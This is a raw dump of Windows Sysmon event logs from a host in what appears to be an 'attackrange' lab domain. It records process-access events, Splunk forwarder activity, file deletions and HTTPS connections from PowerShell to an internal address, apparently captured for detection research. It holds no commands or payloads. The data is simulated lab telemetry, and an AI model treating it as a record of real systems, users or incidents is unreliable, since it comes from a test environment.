13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036496025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:28.800{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50360-false10.0.1.12-8000- 23542300x800000000000000036496061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:00.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=740706D0340B432978E9684717A77151,SHA256=1DBABEBDA64F7436C3533BDFAC7DA64CC0B484B645629BA02DB2BAA581324C66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:30.485{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50361-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:02.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26F279CE981F858BC3128D36280628DD,SHA256=FB07CAEC72C27F209EC80C25416D61E11D60A0282FBD575E1FFB6DBEE22D673A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:03.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD2C0DBD3735E3F9D18412F282335850,SHA256=ABDED824BD35B115373220303C29368D77CAE2F2C86F573A0C42E296CD6182A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:04.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=098E9153AB392BD29243002718A55547,SHA256=969C6EDF038651F754399064C9AE78A1BB20213437EAA2A193BE84CF5EE45F2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:04.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F57F0E50F8416BACD5FF261C52D79DBB,SHA256=DC477243AD124733F066CD61125C0A29E02E96AA4BF1B112E2E76CE4FCEE0F57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:35.495{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50363-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:34.817{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50362-false10.0.1.12-8000- 23542300x800000000000000036496066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:05.084{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE6BAFD69C6EAD2DD62B0BDFD96C920,SHA256=21C2D32183D51FA816AEB43FC6C28A0EBA83680AC380D6CAF7C01EB856500FDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 